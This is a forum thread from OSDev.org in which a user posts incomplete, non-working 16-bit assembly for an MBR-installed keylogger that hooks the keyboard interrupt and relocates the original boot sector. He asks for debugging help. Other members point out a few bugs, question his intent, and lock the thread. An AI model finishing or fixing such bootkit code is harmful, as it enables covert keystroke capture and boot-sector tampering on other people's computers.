OSDev.org
https://forum.osdev.org/

hook irq1 installed at MBR
https://forum.osdev.org/viewtopic.php?f=13&t=32709
Page 1 of 1

Author:  Apolo [ Wed Jan 24, 2018 7:46 am ]
Post subject:  hook irq1 installed at MBR

i am coding a program that hook teh IRQ 1 and is installed onto MBR and restore teh original MBR that is saved at sector 7 however the OS don't bootstrap. here is my code:

Code:
org 100h
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV AX,301H
MOV CX,7
INT 13H
MOV SI,int9_installer
MOV DI,0E00H
MOV CX,1FDH
REP MOVSB
ES
MOV WORD[0FFEH],0AA55h
MOV AX,301H
MOV CX,1
INT 13H
RET

int9_installer:
cli
push es
mov ax,0
mov es,ax
es
mov cx,[24h]
es
mov dx,[26h]

...

mov cx,0
mov dx,2000h
es
mov [24h],cx
es
mov [26h],dx
pop es
sti
...

mov      si,3100h
mov      al,10h
mov      [si],al
mov      al,0
mov      [si+1],al
mov      al,01
mov      [si+2],al
mov           al,0
mov      [si+3],al
MOV      AX,7C00H
mov      [si+4],ax
mov      ax,0h
mov      [si+6],ax
mov      ax,7
mov      [si+8],ax
xor      ax,ax
mov      [si+0ah],ax
mov      [si+0ch],ax
mov      [si+0eh],ax

mov      ah,42h
mov      dl,80h
INT      13H


JMP           0:7C00H



Where is wrong at my code above???

Author:  iansjack [ Wed Jan 24, 2018 10:20 am ]
Post subject:  Re: hook irq1 installed at MBR

You don't initialize the segment registers, you don't initialize the direction flag, and you set the origin to 100h, which is almost certainly not what you intended. I'm not going to wade through the code to find other mistakes, but those ones need to be corrected first

Author:  AJ [ Wed Jan 24, 2018 10:44 am ]
Post subject:  Re: hook irq1 installed at MBR

Hi,

In addition to iansjack's post, we have eabsolutely no context for the code. You call this a "program". Does that mean that it is *not* running in a freestanding environment (which could also explain the org directive).

We also don't have a very good idea of what you expect to see compared with what you actually do see. Can you use some other tool to verify that the sectors are on disk where you expect them to be?

Cheers,
Adam

Author:  Apolo [ Wed Jan 24, 2018 11:22 am ]
Post subject:  Re: hook irq1 installed at MBR

my code is a keylogger that hook IRQ 1 and is installed onto MBR and teh original MBR is writed at sector 7 to be jmp after my keylogger is installed. org 100h directive is because is written in fasm. how to set direction flag and i should set segment registers to what value?

Author:  iansjack [ Wed Jan 24, 2018 11:30 am ]
Post subject:  Re: hook irq1 installed at MBR

I think you need to learn a little more about how the processor works, its state after reset, and the boot sequence before attempting this sort of program. Also, I'm not convinced that you understand the ORG directive.

And, I guess, the question is what are you attempting to achieve by hooking this interrupt. It is, potentially, something that I wouldn't feel comfortable helping with.

Author:  Brendan [ Wed Jan 24, 2018 9:58 pm ]
Post subject:  Re: hook irq1 installed at MBR

Hi,

Apolo wrote:
my code is a keylogger that hook IRQ 1 and is installed onto MBR and teh original MBR is writed at sector 7 to be jmp after my keylogger is installed. org 100h directive is because is written in fasm. how to set direction flag and i should set segment registers to what value?


To clear the direction flag, use the CLD instruction.

The BIOS loads the MBR at "some combination of segment:offset that adds up to 0x0007C00". If you set ORG to 0x0100 (telling the assemebler to assume the "offset" for the start of your code will be 0x0100) then you'd need your segments to fulful the equation "0x0007C00 = (segment / 16) + 0x0100". That means you'd need to set segments to 0x07D0. Note that it's much easier to set ORG to 0x00007C00 and set all segments to zero.

For the rest, for assembly language there are only 2 kinds of bugs - the comments don't describe a correct algorithm, or the instructions don't match the comments. Your code has no comments and therefore your code is 100% bugs.

Finally; don't forget that all sane operating systems dispose of the BIOS early during boot and install their own (protected mode or long mode) device drivers with their own IRQ handlers; so (assuming things like TPM and "secureboot" don't do their job) your code still can't work.


Cheers,

Brendan

Author:  AJ [ Thu Jan 25, 2018 5:19 am ]
Post subject:  Re: hook irq1 installed at MBR

That last point is the most important for a keylogger. Any OS worth its salt will end up reinstalling an IDT and chances are your code will end up in an in-mapped memory page anyway.

You'd generally be better off with a hardware key logger but what you are doing may be at best immoral and at worst illegal :!:

Before we go further, could you clarify the intention of what you are doing. If you're just playing with boot code on your own machine then fine.

Cheers,
Adam

Author:  Apolo [ Fri Jan 26, 2018 4:26 am ]
Post subject:  Re: hook irq1 installed at MBR

i think BIOS of my PCs is all infected because i try this code most simple but the PCs don't bootsrap however. see my most simple code:

Code:
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV CX,7
MOV AX,301H
INT 13H
MOV CX,1BDH
MOV SI,example
MOV DI,0E00H
REP MOVSB
MOV AX,301H
MOV BX,0E00H
MOV AX,301H
MOV CX,1
INT 13H
RET

example:
MOV AX,201H
PUSH ES
MOV BX,0
MOV ES,BX
MOV BX,7C00H
MOV CX,7
INT 13H
POP ES
cs
jmp bx

codesize:

Aaaaaaaaa! what is the problem of my code? :x

Author:  iansjack [ Fri Jan 26, 2018 5:15 am ]
Post subject:  Re: hook irq1 installed at MBR

The main problem is that you haven't told us what you are trying to do and why. Until we know that it is unlikely that you will get any further help on this forum. It's devoted to OS development, not hacking.

Author:  AJ [ Fri Jan 26, 2018 5:24 am ]
Post subject:  Re: hook irq1 installed at MBR

You one more attempt at explaining why you are doing this before the thread gets locked. If you are doing this for legit reasons, it sounds like an interesting problem to tackle, but we will also need more of a technical explanation. A bug in your code or methodology is much more likely than your BIOS being infected.

Cheers,
Adam

Author:  Apolo [ Fri Jan 26, 2018 5:31 am ]
Post subject:  Re: hook irq1 installed at MBR

resume:

i am trying to bootstrap from sector 7 that is where teh original MBR is writed. can someone help me?? i am desesperate!

Author:  AJ [ Fri Jan 26, 2018 6:02 am ]
Post subject:  Re: hook irq1 installed at MBR

Unfortunately locked as promised. I can only assume that this is being done for nefarious purposes...

Page 1 of 1 All times are UTC - 6 hours
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group
http://www.phpbb.com/